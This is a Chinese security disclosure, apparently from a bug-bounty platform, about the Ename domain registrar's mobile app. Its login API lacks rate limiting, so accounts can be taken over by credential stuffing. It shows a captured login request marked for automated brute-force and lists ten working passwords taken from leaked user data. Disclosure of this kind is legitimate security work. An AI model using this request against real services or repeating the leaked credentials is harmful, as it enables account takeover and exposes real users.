漏洞详情

披露状态:

2014-09-19: 细节已通知厂商并且等待厂商处理中
2014-09-22: 厂商已经确认,细节仅向厂商公开
2014-10-02: 细节向核心白帽子及相关领域专家公开
2014-10-12: 细节向普通白帽子公开
2014-10-22: 细节向实习白帽子公开
2014-11-03: 细节向公众公开

简要描述:

APP设计缺陷可劫持他人域名

详细说明:

下载了一个易名中国的APP,发现登陆接口没有做验证,可以进行扫号,登陆其他域名账号。
登陆时抓包

POST /oauth2/toAuth/? HTTP/1.1
Host: open.ename.net
Proxy-Connection: close
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 61
Connection: close
User-Agent: 域名 2.2.2 (iPhone; iPhone OS 7.1.2; zh_CN)
username=§123123%40qq.com§&psw=§12123§&appkey=6656c381bd14a8


利用互联网上泄露的用户数据进行测试
测试结果

11.jpg


返回包长度为278,279的都可以登陆
放上一部分数据

[email protected]	xiaoshan
[email protected] wishlike
[email protected] xueyizhou2001
[email protected] wobushuo
[email protected] www654321
[email protected] 85825260
[email protected] wangping748264
[email protected] 591771abcd
[email protected] qiaolin911
[email protected] 6crx99tj


登陆下看看
中国知识网

12.jpg


1.jpg


2.jpg


3.jpg


4.jpg


漏洞证明:

12.jpg

修复方案:

对APP登陆接口进行限制。

标签: none

评论已关闭